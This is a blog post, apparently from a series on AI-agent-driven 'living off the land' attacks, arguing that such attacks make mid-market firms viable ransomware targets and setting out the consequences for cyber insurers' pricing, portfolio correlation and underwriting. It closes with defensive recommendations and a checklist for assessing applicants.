The Mid-Market Crosshairs: How LOTL 2.0 Eliminates the "Too Small to Target" Protection

There was an implicit protection that mid-market organizations enjoyed in the cyber threat landscape: they were too small to justify the cost of a sophisticated human attacker. That protection is evaporating, and most risk models haven’t caught up.

The Economic Model That Protected Mid-Market

The Old Attacker Economics

For a financially motivated threat actor, every target is a business decision. The calculation was straightforward:

• Revenue per target: Ransomware payment or BEC theft, typically $50K–$500K for mid-market organizations
• Cost per target: Skilled operator time ($150–400/hour), infrastructure, and opportunity cost
• Time per target: Weeks of reconnaissance, initial access, lateral movement, and execution
• Success rate: 60–80% for dedicated campaigns against mid-market targets with weak defenses

The math worked like this: a skilled operator generating $200K per successful compromise, spending 3–4 weeks per target, with a 70% success rate = approximately $35K per week in expected revenue. That’s good money, but it limits the operator to roughly 12–15 targets per year.

Given this constraint, the rational attacker targeted organizations where the expected revenue justified the time investment. A $50M revenue company with a $100K ransomware demand was marginal. A $500M+ enterprise with a $2M+ demand was clearly worth the effort.

The New Attacker Economics

Autonomous LOTL attacks change the equation fundamentally:

• Revenue per target: Same ($50K–$500K for mid-market)
• Cost per target: Compute costs — estimated $1–10 per target for agent execution
• Time per target: Hours instead of weeks (agent operates continuously)
• Success rate: Potentially higher — agents don’t make human errors, don’t get impatient, execute consistently
• Parallelism: A single attacker can deploy agents against 100+ targets simultaneously

The new math: 100 parallel agent operations, each costing $5 in compute, with a 50% success rate and $150K average ransom = $7.5M in expected revenue for $500 in compute costs. The mid-market “too small to target” calculation no longer applies.

Why Mid-Market Is the Sweet Spot

Mid-market organizations sit at the intersection of three conditions that make them ideal LOTL 2.0 targets:

1. Sufficient Assets to Be Profitable

Mid-market companies have enough revenue, data, and operational dependency on IT systems to generate meaningful ransom payments or BEC theft. A €200M manufacturer that can’t ship product for two weeks will pay a $500K ransom without hesitation. That’s a worthwhile return for $5 in attacker compute costs.

2. Insufficient Security to Resist LOTL

Enterprise organizations have dedicated security teams, 24/7 SOC operations, and sophisticated detection capabilities. Mid-market organizations typically have:

• IT generalists who handle security as part of broader responsibilities
• Basic endpoint protection (antivirus, maybe basic EDR) without behavioral analytics
• Limited or no SIEM — logs exist but aren’t actively monitored
• Flat networks with minimal segmentation
• Service accounts with standing privileges and no monitoring
• No dedicated incident response capability

This is precisely the security posture that LOTL attacks exploit most effectively.

3. Sufficient Insurance Coverage to Be Worth Targeting

Cyber insurance has been widely adopted in the mid-market, particularly in sectors with regulatory requirements or customer contractual obligations. This means:

• Insureds have coverage limits that justify the attacker’s effort
• Incident response and forensic costs are covered, creating less resistance to engaging responders (which attackers sometimes exploit for intelligence)
• The insurance market has collected sufficient data about mid-market organizations (through applications and claims) to create a rich intelligence pool

The Portfolio Risk for Insurers

For cyber insurers, the mid-market concentration risk is the most significant implication of LOTL 2.0.

Frequency Shock Scenario

Consider a portfolio of 500 mid-market cyber policies with a historical annual claims frequency of 8–12% (40–60 claims per year). If LOTL 2.0 enables parallel targeting that increases attack frequency against this segment by 50%, the portfolio generates 60–90 claims per year.

At an average claim cost of $350K (including BI, forensic, and ransomware payment), the difference between 40 claims ($14M) and 90 claims ($31.5M) is $17.5M — more than double the expected loss.

Correlation Risk

Traditional cyber insurance models assume that claims are largely independent events — one insured getting hit with ransomware doesn’t meaningfully affect the probability of another insured getting hit. LOTL 2.0 breaks this assumption:

• A single attacker deploying agents against 100+ targets in parallel creates correlated claims events
• Sector-specific targeting (e.g., manufacturers, healthcare providers) concentrates claims within specific insured segments
• Temporal clustering — if multiple insureds in a portfolio are hit within the same week, it may overwhelm claims handling capacity and increase adjustment costs

The Reinsurance Implications

For reinsurers and ILS (Insurance-Linked Securities) markets, the LOTL 2.0 mid-market targeting creates:

• Higher aggregate loss potential from frequency-driven events
• Reduced diversification benefit from mid-market portfolios that were previously considered lower-risk
• Model uncertainty — historical loss data doesn’t reflect the new attacker economics

What Mid-Market Insureds Should Be Doing

For risk engineers and loss control teams working with mid-market insureds, the priority recommendations are:

Immediate Actions (0–30 days)

1. Enable PowerShell logging on all endpoints — this is free, built into Windows, and provides critical visibility
2. Enforce MFA on all privileged accounts — including service accounts where technically feasible
3. Audit local admin rights — reduce the number of accounts with administrative privileges to the minimum necessary
4. Enable advanced audit policies — particularly process creation (4688) with command-line logging

Short-Term Investments (30–90 days)

5. Deploy or upgrade EDR — ensure behavioral detection capabilities are active, not just signature matching
6. Implement network segmentation — at minimum, separate critical systems from general user networks
7. Establish SIEM monitoring — even a basic cloud SIEM with LOTL-specific use cases is better than none
8. Create a service account inventory — document every service account, its purpose, and required permissions

Strategic Investments (90+ days)

9. Implement PAM — just-in-time privileged access for all administrative functions
10. Deploy behavioral analytics — UEBA that establishes baselines and alerts on deviations
11. Develop incident response capability — either internal or through a retained IR firm with LOTL expertise
12. Conduct purple team exercises — specifically testing LOTL attack scenarios against current defenses

The Underwriter’s Mid-Market Checklist

When reviewing mid-market applications, use this rapid assessment to gauge LOTL 2.0 exposure:

Question	Red Flag Answer	Green Flag Answer
”Do you have dedicated security staff?"	"IT handles security”	Named CISO, security team
”Is PowerShell logging enabled?"	"We’re not sure"	"Yes, script block logging, forwarded to SIEM"
"What percentage of accounts have local admin?"	"Most users” or “Not sure"	"< 5%, audited quarterly"
"Do you have a PAM solution?"	"No” or “What’s PAM?"	"Yes, JIT access for all admin"
"How do you detect lateral movement?"	"We have a firewall"	"NDR + behavioral analytics on east-west traffic"
"When did you last test for LOTL scenarios?"	"Never” or “We do annual pen tests"	"Purple team exercise within last 6 months"
"Do you have MFA on service accounts?"	"Service accounts are excluded"	"Yes, managed service accounts with automatic rotation”

The Pricing Reality Check

If your mid-market book was priced based on historical loss frequency data from 2020–2024, those prices likely understate the risk under LOTL 2.0 conditions. The question isn’t whether to adjust pricing — it’s how much and how quickly.

Conservative approach: apply a 10–20% frequency load to mid-market segments based on the attacker economics shift.

Aggressive approach: re-underwrite the entire mid-market book using LOTL-specific control criteria, with significant surcharges for organizations that lack behavioral monitoring and identity-based controls.

The right answer is probably somewhere in between — but the direction is clear: mid-market cyber risk is underpriced relative to the LOTL 2.0 threat landscape.

---

This is the fourth post in our LOTL 2.0 Series. Previous: The Detection Gap Analysis → | Next: The LOTL 2.0 Incident Tracker — real-world cases and evidence →